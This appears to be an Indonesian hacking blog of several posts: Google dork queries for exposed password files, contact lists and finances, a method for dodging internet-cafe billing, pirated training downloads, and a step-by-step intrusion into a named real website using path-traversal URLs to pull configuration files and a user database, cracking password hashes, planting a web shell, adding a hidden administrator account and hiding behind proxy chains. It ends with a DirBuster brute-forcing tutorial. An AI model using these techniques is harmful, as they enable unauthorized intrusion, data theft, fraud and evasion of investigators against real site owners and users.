“Powered by DUdownload” -site:duware.com
“Powered by DUpaypal” -site:duware.com
“Powered by DUforum” -site:duware.com
intitle:dupics inurl:(add.asp | default.asp |view.asp | voting.asp) -site:duware.com
websites yang menggunakan DUclassified, DUcalendar, DUdirectory, DUclassmate, DUdownload, DUpaypal, DUforum or DUpics applications, secara default memungkinkan kita untuk mengambil passwords file
– untuk DUclassified, just enter http:///duClassified/ _private/duclassified.mdb
atau http:///duClassified/

intext:”BiTBOARD v2.0? “BiTSHiFTERS Bulletin Board”
website yang menggunakan Bitboard2 bulletin board, secara default settings memungkinkan kita untuk mengambil passwords file to be obtained
– dengan cara http:///forum/admin/data _ passwd.dat
atau http:///forum/forum.php

Mencari Dokumen khusus ?
filetype:xls inurl:”email.xls” email.xls
files, berpotensial untuk mengambil contact information

“phone * * *” “address *” “e-mail” intitle:”curriculum vitae”
CVs

“not for distribution”
confidential documents containing the confidential clause

buddylist.blt
AIM contacts list

intitle:index.of mystuff.xml
Trillian IM contacts list

filetype:ctt “msn”
MSN contacts list

filetype:QDF
QDF database files for the Quicken financial application

intitle:index.of finances.xls
finances.xls files, berpotensial untuk mengambil information on bank accounts, financial summaries and credit card numbers

intitle:”Index Of” -inurl:maillog maillog size maillog files, berpotensial untuk mengambil e-mail

“Network Vulnerability Assessment Report”
“Host Vulnerability Summary Report”
filetype:pdf “Assessment Report”
“This file was generated by Nessus”
reports for network security scans, penetration tests etc. On the Net

untuk lebih kreatifnya bisa di coba coba sendiri, okeh
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
easy donwload from rapidshare
Download dari rapid share adalah mudah Mungkin banyak orang yang berburu account premier di internet (google misalnya). Tapi itu bagaikan mencari jarum dalam jerami, tidak percaya? silahkan saja coba. Kemudian bermunculan tools untuk "mengakali" download limited dari rapidshare ini. Tapi yang perlu diketahui,pihak admin rapidshare bukanlah orang bodoh. Mereka selalu berusaha menutup lubang-lubang itu.
Mungkin tools yang cukup berjaya kemaren adalah rapid kill. Kecepatan downloadnya luar biasa.Tapi sekarang rapid kill telah diblok oleh server2/hosting. Pihak server telah (hampir semua) melakukan patch terhadap sistemnya. Kemarin aku berhasil menemukan hostingan yang bisa buat rapid kill (tapi ini ilegal). Kecepatan rata2 downloadnya adalah 2 Mb/s. Luar biasa bukan?. Tapi sedikit susah soale,siang bikin account,malam buat download macem2. Dijamin deh paginya accountnya udah di delete. (artinya hosting ini hanya efektif untuk 1 malam). susah bukan?
Lalu bagaimana?.Sebenarnya kalo diceritakan masalah berburu download dari rapid share akan sangat panjang. Tapi akhir2 ini saya menemukan link buat download dari rapid share. Mau?
coba deh klik link dibawah ini,

>>>download from rapidshare is easy<<< Nb: ada cara yang lebih baik,yaitu dengan menggabungkan beberapa cara.cobalah. Diposkan oleh abdul&upin 0 komentar Link ke posting ini Mencurangi (hampir) Semua Jenis Billing Warnet Ini dia caranya ... Saat kita mulai menyalakan komputer di warnet yang pertama muncul saat windows dimulai adalah login screen client billing yang menutupi seluruh area windows. Fungsi Alt+Tab dan Ctrl+Alt+Del biasanya ikut-ikutan di-disable untuk memaksa kita login melalui program billing itu. Sebenarnya saat kita menghadapi login screen itu komputer sudah siap dijalankan. Hanya terhalang oleh screen login yang menyebalkan itu. Naah... udah tau apa yang bakal saya jelasin ? Kalo udah tau, brenti aja bacanya. Daripada mati kebosanan Yess.. betul sekali. Yang perlu kita lakukan hanyalah menyembunyikan jendela login itu tanpa perlu login. Ada banyak progie buat nyembunyiin window, salah satunya ZHider. Saya hanya akan menjelaskan penggunaan ZHider. Bagi yang menggunakan progie laen silakan baca manualnya, tapi yang perlu diperhatikan adalah progie yang anda gunakan harus bisa show/hide window pake hotkey coz windows kita kan ditutupi sama login screen sialan itu. Yang harus disiapkan: 1. Program ZHider. Cari sendiri pake om google. Ukurannya kecil kok, ga sampe setengah isi disket. Aku nemunya pas smp tapi baru sekarang kepake ^^ 2. Muka bego 3. Mental yang kuat Langkah-langkahnya: 01. Masuk warnet dan pasang muka bego biar ga dicurigai operator 02. Pastikan selain box/bilik yang kita tempati masih ada box lain yang kosong. Biar ga dicurigai juga sih. 03. Usahakan cari tempat yang jauh dari op, supaya ga ketahuan box kamu kosong apa nggak. 04. Nyalakan kompi dihadapan anda bila masih dalam keadaan mati. 05. Saat masuk login screen, login aja seperti biasa. 06. Jalankan ZHider yang sudah disiapkan di disket/flashdisk. Kalo belom ada, cari aja pake google. 07. Setelah ZHider dijalankan langsung aja logout. 08. Naah, di login screen ini kita mulai aksi mendebarkan kita. Tekan Ctrl+Alt+Z.. Jreeeng, login screen telah menghilang !!! 09. Browsinglah sepuasnya, tapi tetap pastikan ada box lain yang kosong. Kan aneh kalau ada yang masuk warnet, dia lihat udah penuh. Padahal di billing server kelihatan masih ada yang belum login. 10. Kalo sudah puass tekan Ctrl+Alt+x untuk memunculkan kembali login screen yang menghilang entah kemana 11. Login seperti biasa dan browsing beberapa menit sampai penunjuk tarif sampai ke angka yang kita kehendaki. Ini supaya ga dicurigai. 12. Logout. SIapkan muka bego, lalu bayar tarif. Cara ini lebih mudah dilalukan bila si operator ga terlalu kenal sama kamu. Apalagi bila si op sering keluyuran. Ini beberapa hotkey ZHider yang bisa digunakan, untuk hotkey lainnya silakan baca file readme yang disertakan bersama zhider CTRL+ALT+Z Menyembunyikan jendela aktif CTRL+ALT+X Menampilkan kembali semua jendela yang disembunyikan CTRL+ALT+L Menampilkan dialog zhider CTRL+ALT+M Menampilkan kembali semua jendela yang disembunyikan, dan juga menutup zhider. Kalo cara di atas ga bisa dilakuin, hentikanlah usahamu. Sesungguhnya perbuatan jahatmu tidak diridhai Tuhan Kalo ketahuan langsung pertebal "muka bego"-mu. Misalnya bilang "Eh, kok jadi gini ya? Kemaren ga gini kok." Ato kata-kata lain, tergantung kreatifitas anda. tapi klo bs jangan di lakukan yaw bro...berapa sih harga yang harus di bayar cm bt ngenet 1 jam?.....ojo mateni sandang pangane lian.... Diposkan oleh abdul&upin 0 komentar Link ke posting ini Langkah bobol web rasasayang.com.my Situs www.rasasayang.com.my secara sekilas terlihat tidak memiliki bug yang cukup berarti untuk dieksploitasi oleh hacker. Namun ternyata masih terdapat celah yang bisa dieksploitasi. Berikut ini langkah-langkah yang dilakukan untuk membobol server ini. 1. Persiapan hacking 2. Pemeriksaan bug 3. Mendownload source code dan file konfigurasi 4. Mengupload file explorer dan windows shell command interface 5. Mengambil-alih server Saya akan menjelaskan langkah-langkah di atas satu per satu. 1. Persiapan hacking Sebelumnya Anda harus memiliki list proxy server yang mendukung proxy-chain untuk menghindari pelacakan. Anda harus mengkoneksikan sekurang-kurangnya 2 anonymous proxy server di 2 negara yang berbeda. Anda dengan mudah mendapatkan proxy server di search engine Google. Namun bila Anda menemukan lebih banyak transparant proxy server, gunakan 3 transparant proxy server yang mendukung chain, dan rutekan koneksinya melintasi beberapa negara, misalnya: Brazil - China - India, sehingga bila dilacak oleh "Pengejar Hacker" maka mereka hanya akan melacak koneksi dari ISP Indonesia ke China. Pada sistem operasi windows, anda dapat menggunakan software mungil bouncer.exe untuk melakukan proxy-chain melalui parameter tunneling. Contoh dengan IP lokal 192.168.0.5: bouncer --bind 192.168.0.5 --port 8881 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080 bouncer --bind 192.168.0.5 --port 8882 --tunnel 192.168.0.5:8881 --destination 200.0.0.1:3128 Pada contoh di atas, bila kita mengeset proxy pada internet browser menjadi 192.168.0.5:8882 maka koneksi kita akan dirutekan melalui proxy server: 82.0.0.1:8080 -> 221.0.0.1:8080 -> 200.0.0.1:3128 -> www.rasasayang.com.my
Karena kita menggunakan transparant proxy server maka IP 221.0.0.1 juga akan terlacak. Namun ini tidak masalah karena kita sebenarnya terkoneksi dari proxy server 82.0.0.1.

2. Pemeriksaan bug
Pemeriksaan dilakukan secara trial and error pada setiap parameter yang diperkirakan mengandung bug. Pada kasus ini terdapat bug pada module downloading file untuk mendownload file .mp3 dengan URL:
http://www.rasasayang.com.my/index.cfm??dir=download&menu=home&task=dl_comm&cfile=
Dari parameter di atas terlihat file dl_comm.cfm terletak pada folder download. Sekarang kita coba secara langsung mengeksekusi pada file .cfm tersebut dan menyisipkan parameter querystring cfile untuk mendapatkan source codenya.
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\download\dl_comm.cfm
Ternyata hasilnya adalah file source code dl_comm.cfm. Berikut ini adalah bagian penting dari source code tersebut.


Dari source code ini kita bisa menemukan bahwa terdapat parameter querystring abs_dir dan cfile yang bisa mengarahkan kita untuk mendownload file apa saja dari harddisk server.

3. Mendownload source code dan file konfigurasi
Kita jejaki setiap link di dalam source code-nya, kemudian kita download. Misalnya:
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\application.cfm
http://www.rasasayang.com.my/download/dl_comm.cfm?CFILE=..\index.cfm
Dari kumpulan file inilah kemudian kita mendapatkan bocoran source code situs www.rasasayang.com.my yang telah diberitakan sebelumnya di situs ini.
Selanjutnya kita download file konfigurasi web servernya dengan cara berikut:
File konfigurasi IIS:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\WINDOWS\system32\inetsrv\MetaBase.xml
File konfigurasi CFM:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\CFusionMX7\lib\neo-query.xml
File History Internet Explorer untuk Administrator
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=C:\&CFILE=..\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Dari file Metabase.xml kita dapat mengetahui bahwa terdapat beberapa situs web yang hosting di server ini.
- www.powerofpaytv.com, www.thepowerofpaytv.com yang terletak di E:\webuser\web\powerofpaytv.com
- www.jedrealty.com yang terletak di E:\webuser\web\jedrealty.com
- www.rasasayang.com.my yang terletak di E:\webuser\web\rasasayang.com.my
Dari file index.dat kita dapat mengetahui bahwa Administrator melakukan proses administrasi upload dan download file dengan mengunjungi http://www.powerofpaytv.com/cometadvance/
Dari file neo-query.xml kita dapat mengetahui file database pengguna terletak di E:\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb yang dapat kita download melalui:
http://www.rasasayang.com.my/download/dl_comm.cfm?abs_dir=E:\&CFILE=..\webuser\web\powerofpaytv.com\_db\dcm_casbaa_db.mdb
Dari file dcm_casbaa_db.mdb ini kita memperoleh user-id dan password dalam bentuk MD5 hash. Dengan menggunakan software decryptor misalnya Cain & Abel kita dapat mendecyrpt passwordnya.

4. Mengupload file explorer dan windows shell command interface
Dari http://www.powerofpaytv.com/cometadvance/ kita dapat mengupload file explorer misalnya ASF File Explorer yang dibuat oleh Nahuel Foronda and Laura Arguello. Dengan ASF File Explorer, kita dapat membrowse file di harddisk secara lebih leluasa, serta meng-upload, download dan delete file.
Untuk windows shell command interface, kita buatkan file.CFM dengan script berikut:









#Replace(Replace(Replace('#cmdResult#', '<', '<', 'all'), '>', '>', 'all'), Chr(10), '
', 'all')#

5. Mengambil-alih server
Kita dapat menambahkan user login windows (group administrator) dengan mengeksekusi perintah berikut pada windows shell command interface.
NET USER mbahjambon mypassword /ADD /ACTIVE:YES /EXPIRES:NEVER /PASSWORDCHG:YES
NET LOCALGROUP Administrators mbahjambon /ADD
Dengan menggunakan Windows Remote Desktop kita dapat mengambil alih servernya (IP 202.157.176.17). Koneksinya tetap dilakukan melalui proxy tunneling seperti contoh berikut:
bouncer --bind 192.168.0.5 --port 8883 --tunnel 82.0.0.1:8080 --destination 221.0.0.1:8080
bouncer --bind 192.168.0.5 --port 8884 --tunnel 192.168.0.5:8883 --destination 202.157.176.17:3389
sehingga kita dapat meremote server melalui Remote Desktop pada alamat: 192.168.0.5:8884
Demikian cara yang digunakan untuk membobol server situs www.rasasayang.com.my. Dengan membaca tulisan ini, mudah-mudahan para pembaca dapat menghindari bug sejenis pada server Anda.
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
Hacking Video - Career Academy Hacking
mau belajar hacking video.......ga sah jauh jauh belajar aja sndri,tapi kudu siapin dana extra bt ke warnet hehehehehe,silahkan donload aja di link bawah ini.....

!!! Untuk mendownload hilangkan tanda star (bintang/ *) pada alamat/link dibawah !!!
-Training Module 1 Ethical Hacking and Penetration Testing - cd 1 - 250 mb
http://r*a*p*i*d*s*h*a*r*e.com/files/6870957/traininga.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6875509/traininga.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6880184/traininga.part3.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6884786/traininga.part4.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6889797/traininga.part5.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6890170/traininga.part6.rar.html
-
------------ --------- --------- --------- --------- --------- -
-Training Module 2 Footprinting and Reconnaissance - cd 2 - 210 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/6920123/trainingb.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6925380/trainingb.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6930474/trainingb.part3.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6935598/trainingb.part4.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6937268/trainingb.part5.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 3 TCP IP Basics and Scanning - cd 3 - 153 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/6950222/trainingc.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6954540/trainingc.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6958405/trainingc.part3.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6958651/trainingc.part4.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 4 Enumeration and Verification - cd 4 - 200 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/6995889/trainingd.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/6999123/trainingd.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7002551/trainingd.part3.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7005909/trainingd.part4.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7006074/trainingd.part5.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 5 Hacking Defending Wireless Modems - cd 5 - 94 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7017480/traininge.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7021255/traininge.part2.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 6 Hacking Defending Web Servers - cd 6 - 150 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7029199/trainingf.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7034545/trainingf.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7039580/trainingf.part3.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7040200/trainingf.part4.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 7 Hacking Defending Web Applications - cd 7 - 110 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7049302/trainingg.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7054559/trainingg.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7056051/trainingg.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 8 Sniffers and Session Hijacking - cd 8 - 115 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7069844/trainingh.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7076146/trainingh.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7084439/trainingh.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 9 Hacking Defending Windows Systems - cd 9 - 120 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7090868/trainingi.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7095821/trainingi.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7097885/trainingi.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 10 HackingDefending Unix Systems - cd 10 - 150 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7136591/trainingJ.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7139658/trainingJ.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7142501/trainingJ.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 11 Rootkits Backdoors Trojans Tunnels - cd 11 - 115 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7147118/trainingk.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7159091/trainingk.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7160611/trainingk.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 12 Denial of Service and Botnets - cd 12 - 100 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7182977/trainingL.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7187533/trainingL.part2.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 13 Automated Pen Testing Tools - cd 13 - 102 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7202752/trainingm.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7208149/trainingm.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7208549/trainingm.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 14 Intrusion Detection Systems - cd 14 - 140 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7224433/trainingn.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7230417/trainingn.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7234950/trainingn.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 15 Firewalls - cd 15 - 160 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7252545/trainingo.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7255895/trainingo.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7258850/trainingo.part3.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7259491/trainingo.part4.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 16 Honeypots and Honeynets - cd 16 - 120 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7262593/trainingp.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7265259/trainingp.part2.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7266075/trainingp.part3.rar.html
------------ --------- --------- --------- --------- --------- -
-Training Module 17 Ethics and Legal Issues - cd 17 - 90 mb

http://r*a*p*i*d*s*h*a*r*e.com/files/7268140/trainingq.part1.rar.html
http://r*a*p*i*d*s*h*a*r*e.com/files/7269823/trainingq.part2.rar.html

password : *jL4XyiI7MxX3afM0*

moga berhasil ya sob......
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
10 Spesialisasi di bidang kejahatan cyber
Hacker Seperti halnya profesi seorang dokter yang spesialis dalam bidang-bidang tertentu seperti bedah, anak-anak atau tulang, maka di dunia kejahatan dunia maya (cyber) pun ada pembagian-pembagian fokus pada bidang-bidang tertentu.
Kejahatan cyber semakin banyak macamnya dan karena perkembangan zaman, seorang penjahat cyber akan mengalami kesulitan jika harus melakukan semua peran. Untuk itulah terdapat beberapa peran yang terlibat di dalam kejahatan cyber dan masing-masing peran tersebut memiliki tugas yang spesifik.
Steven R. Chabinsky, seorang pembantu wakil direktur FBI, saat menjadi pembicara di konferensi GovSec/FOSE di Washington D.C, Amerika Serikat, pada akhir bulan Maret lalu menjelaskan 10 spesialisasi yang dilihat oleh FBI terdapat di dunia kejahatan cyber.
Mereka adalah:
1. Coder atau programmer: "mereka yang menulis malware, eksploit dan tool-tool lainnya yang dibutuhkan untuk melakukan kejahatan."
2. Distributor atau vendor: "mereka yang memperdagangkan dan menjual data curian, dan bertindak sebagai penanggung dari barang-barang yang disediakan oleh bidang-bidang lainnya."
3. Techies: "mereka yang menjaga struktur kriminal, termasuk server, ISP yang bulletproof (tahan peluru) dan enkripsi; dan mereka yang memiliki pengetahuan umum tentang bahasa pemrograman database dan SQL server."
4. Hacker: "mereka yang mencari dan mengeksploitasi aplikasi, sistem dan kelemahan jaringan untuk mendapatkan akses administrator."
5. Fraudster: "mereka yang membuat dan menyebarkan skema 'social engineering', termasuk phishing, spamming (spam) dan domain squatting."
6. Hoster: "mereka yang menyediakan hosting 'aman' dari situs dan server dengan konten terlarang, terkadang melalui botnet yang rumit dan jaringan proxy."
7. Casher: "mereka yang mengontrol urusan rekening dan menyediakan nama serta rekening kepada para penjahat sebagai bayaran."
8. Money mules: "mereka yang melengkapi transfer uang atau tranfer kawat antar rekening bank."
9. Teller: "mereka yang membantu mentransfer dan mencuci uang haram melalui layanan tukar mata uang digital dan antar mata uang yang berbeda di dunia."
10. Leader: "mereka inilah kepalanya. Merekalah yang memilih target; memilih orang yang bekerja untuk mereka sesuai dengan bidangnya masing-masing; yang memutuskan harus melakukan apa, kapan, bagaimana dan dimana; dan mereka yang mengurus pegawai serta masalah pembayaran."
Diposkan oleh abdul&upin 0 komentar Link ke posting ini
Berburu Direktori dan File Sensitif dengan DirBuster
Mungkin anda akan terkejut bila mengetahui bahwa ada banyak website yang berhasil dihack/dideface hanya karena sebuah kesalahan “konyol”. Tidak dibutuhkan keahlian programming, SQL atau jurus njelimet lainnya, cuma membuka sebuah direktori yang berisi file-file sensitif, maka sebuah website akan bertekuk lutut. Ya benar, ini adalah fakta yang seringkali terjadi.
Direktori Sensitif
Semua direktori atau file yang mengandung informasi berguna buat hacker untuk mendeface website anda, maka direktori itu termasuk sensitif. Beberapa direktori atau file yang tergolong sensitif antara lain:

Backup

Hal yang biasanya dibackup adalah database dan source script webnya. Bayangkan apa yang terjadi bila hacker berhasil mendapatkan seluruh file php dan “database dump” dalam satu file zip? Kalau anda berpikir itu tidak mungkin terjadi, anda salah besar, karena saya sering menemukan file backup berekstensi zip, tar.gz, atau sql berserakan di websitenya.

Halaman Login

Ada banyak macam halaman login, umumnya adalah halaman login untuk mengelola isi website, yaitu CMS Administrator. Selain CMS, halaman login yang lain adalah phpMyAdmin, cpanel, Tomcat Admin Page, AXIS2 Admin Page dll. Tomcat dan AXIS2 adalah Java based webserver dan web service platform.
Kenapa halaman login termasuk sensitif? Karena dengan mengetahui URL untuk menjadi Administrator website, seorang hacker bisa melakukan serangan SQL Injection, password guessing, dictionary attack dan brute force attack untuk membuat dirinya menjadi seorang administrator di website anda. Celakanya banyak website yang halaman login adminnya tidak menggunakan password yang kuat, bahkan menggunakan password default.

Log file

Log file biasanya dipakai untuk tujuan debugging atau penelusuran kesalahan oleh web developer. Karena itu tidak heran bila dalam log file banyak mengandung informasi sensitif yang bisa dimanfaatkan hacker. File log ini berbeda-beda tergantung dari web aplikasi yang dipakai karena web developer punya kebebasan untuk membuat atau tidak membuat file log.
Salah satu contoh log file yang biasa ditemukan di web adalah WS_FTP.LOG, file ini dibuat oleh program WS_FTP, yaitu FTP Client. Setiap kali memakai program ini untuk upload ke web anda, WS_FTP akan otomatis memasukkan file WS_FTP.LOG ke dalam folder website anda. Dalam file WS_FTP.LOG ini seorang hacker bisa mendapatkan banyak informasi sensitif: antara lain IP address web server anda (banyak web yang menyembunyikan IP address sebenarnya dibalik NAT), full path lokasi document root web anda, username account hosting anda (bila dalam full path mengandung nama seperti /home/username/…./).
WS_FTP.LOG juga bisa membocorkan isi sebuah direktori bila anda sudah mematikan fitur “Directory Indexing” atau membuat file index.html kosong. Seorang hacker yang tidak bisa melihat isi direktori karena directory index dimatikan atau ada file index.html kosong, bisa mencoba membuka WS_FTP.LOG di direktori itu. Bila ternyata file WS_FTP.LOG ada, maka file log itu akan membocorkan isi file dalam direktori tersebut.
Pesan error di atas umumnya dijumpai pada direktori yang ada, tapi directory indexing tidak diaktifkan, sehingga anda harus menebak nama file yang ada di direktori tersebut. Bila directory indexing diaktifkan, maka anda akan menemukan halaman dengan title “Index of /”.

Versi Lama

Terkadang ketika sebuah website diupdate ke versi baru, file-file script lama disimpan dalam satu direktori bernama oldversion, version1 dan versi barunya dalam direktori /new/ atau /ver2/ atau /beta/. Menemukan beragam versi suatu web adalah kesempatan emas untuk menemukan celah keamanan karena biasanya web versi terbarunya memang tidak mengandung kelemahan, namun bila kita berhasil menemukan versi lamanya, akan ditemukan banyak celah keamanan.
Saya pernah menemukan sebuah website yang securitynya bagus, saya tidak menemukan vulnerability di sana, namun ternyata dia lupa membuang versi lama dari web tersebut. Namun ternyata web versi lama yang mengandung banyak bug dari SQL injection sampai local file injection masih bisa diakses di direktori lain. Walaupun web versi terbaru securitynya bagus, namun jadi tidak berarti apa-apa karena hacker bisa menyerang dari web versi lamanya.
Berburu Direktori dan File Sensitif
Nama direktori atau file bisa ditemukan dengan 2 cara:

Crawling

Crawling ini adalah cara yang dipakai oleh search engine untuk mendapatkan isi website anda. Ini adalah cara yang “sopan”, karena kita hanya mencari apa yang memang disediakan oleh pemilik webnya. Search engine crawling akan mengikuti direktori apa yang boleh dan apa yang tidak boleh diambil dalam file /robots.txt. Jadi bila ada direktori sensitif yang bisa di-search di Google, maka itu terjadi karena di suatu situs ada pointer ke obyek itu berupa link. Bila di seluruh jagat internet ini tidak ada satupun link ke direktori itu, maka tidak mungkin direktori itu muncul di Google.
Kita bisa memanfaatkan Google Hacking untuk mencari direktori sensitif yang sengaja atau tidak sengaja ter-index oleh Google. Kita juga bisa membuat script atau memakai program semacam wget untuk melakukan crawling website (tidak memanfaatkan Google index). Menjalankan crawler sendiri terkadang diperlukan bila kita ingin melakukan crawling direktori yang search engine dilarang untuk masuk (diblacklist di /robots.txt).

Guessing

Bila dengan cara sopan tidak mendapatkan direktori sensitif, maka kita terpaksa pakai cara “kasar”. Mendapatkan direktori sensitif dengan cara ini sama dengan menebak password. Ada dua cara yang bisa dipakai:

Pure Brute Force Attack
Cara ini adalah cara yang paling kasar. Kita mencoba semua kemungkinan kata yang muncul dari huruf , angka dan karakter lain sebagai nama direktori atau nama file. Contoh: request /aa/, lalu /ab/, lalu /ac/, lalu /ad/, demikian seterusnya sampai semua kemungkinan yang ada dicoba. Cara ini membutuhkan waktu yang sangat lama, jadi kurang efektif. Tapi kelebihannya adalah tidak ada direktori yang lolos, karena semua kemungkinan akan dicoba.
Dictionary Attack
Ini adalah cara yang lebih sopan dibanding pure brute force. Kita menggunakan kamus, yaitu kumpulan nama yang akan kita pakai untuk request ke web server. Efektif tidaknya cara ini tergantung dari bagaimana kualitas kamus yang dipakai. Semakin baik kualitas kamusnya, semakin besar kemungkinan berhasil mendapatkan direktori sensitif. Kamus yang baik adalah kamus berisi kata yang memang benar-benar pernah dipakai untuk nama direktori, jadi bukan nama fiktif atau karangan.

DirBuster dari OWASP
Dalam artikel ini saya akan menggunakan tools gratisan, DirBuster yang dibuat oleh OWASP (Open Web Application Security Project), sebuah kelompok non-profit yang berfokus pada keamanan web. Seperti yang sudah saya katakan sebelumnya, kekuatan tools semacam ini tergantung pada kualtias kamus yang dimilikinya.
DirBuster memiliki kamus yang sangat lengkap, bukan nama fiktif yang tidak pernah dipakai, tapi memang benar-benar nama yang pernah dipakai sebagai nama direktori. Kumpulan nama ini didapatkan dari internet dengan cara melakukan crawling terhadap situs-situs internet lalu mengelompokkannya. Kumpulan nama yang dipakai minimal 3 situs berbeda ditaruh di file dengan akhiran small.txt, kumpulan nama yang dipakai minimal 2 situs berbeda ditaruh di file dengan akhiran medium.txt, dan semua nama yang ditemukan ditaruh dalam file berakhiran big.txt.
Bila anda membutuhkan daftar nama direktori saja untuk dipakai di program lain, anda juga bisa mendownload kamusnya saja tanpa harus mendownload DirBuster.
Tools ini sangat mudah digunakan, jadi silakan saja langsung download DirBuster. Sebelumnya pastikan dulu komputer anda sudah terinstall Java, karena tools ini dibuat dengan Java.
Scanning Type
Ada dua jenis scanning yang bisa dilakukan, pure brute force atau dictionary based attack. Bila anda memilih memakai teknik pure brute force, maka anda harus menentukan character set (kumpulan karakter) yang akan dijadikan nama direktori dan tentukan juga panjang minimal dan maksimalnya. Semakin besar populasi dari character set yang anda pilih dan semakin panjang max length yang anda pilih, semakin besar kumpulan kata yang dihasilkan, itu artinya dibutuhkan waktu yang semakin lama untuk mencoba semuanya. Gambar di bawah ini adalah screenshot ketika memilih pure brute force.
Bila memilih list based brute force, maka kita harus memilih file berisi daftar nama direktori. DirBuster sudah menyediakan banyak dictionary yang bisa dipilih sesuai kebutuhan:

directory-list-2.3-small.txt (87650 words) : Minimal dipakai di 3 situs berbeda.
directory-list-2.3-medium.txt (220546 words) : Minimal dipakai di 2 situs berbeda.
directory-list-2.3-big.txt (1273819 words) : Minimal pernah dipakai.
directory-list-lowercase-2.3-small.txt (81629 words) : Versi case insensitive dari directory-list-2.3-small.txt
directory-list-lowercase-2.3-medium.txt (207629 words) : Versi case insensitive dari directory-list-2.3-medium.txt
directory-list-lowercase-2.3-big.txt (1185240 words) : Versi case insensitive dari directory-list-2.3-big.txt
directory-list-1.0.txt (141694 words) : Daftar awalnya, tidak terurut
apache-user-enum-1.0.txt (8916 usernames) : Dipakai untuk user enumeration, mendapatkan valid username di sebuah server
apache-user-enum-2.0.txt (10341 usernames) : Dipakai untuk user enumeration

Dalam list yang disediakan DirBuster juga menyediakan daftar username yang dipakai untuk user enumeration, yaitu mendapatkan nama user yang valid di sebuah server. Dalam web server Apache yang mengaktifkan mod_userdir, bisa dilakukan user enumeration dengan cara menggunakan ~namauser sebagai nama direktori.
Gambar di bawah ini adalah screenshot ketika kita memilih menggunakan dictionary attack.
Starting Options
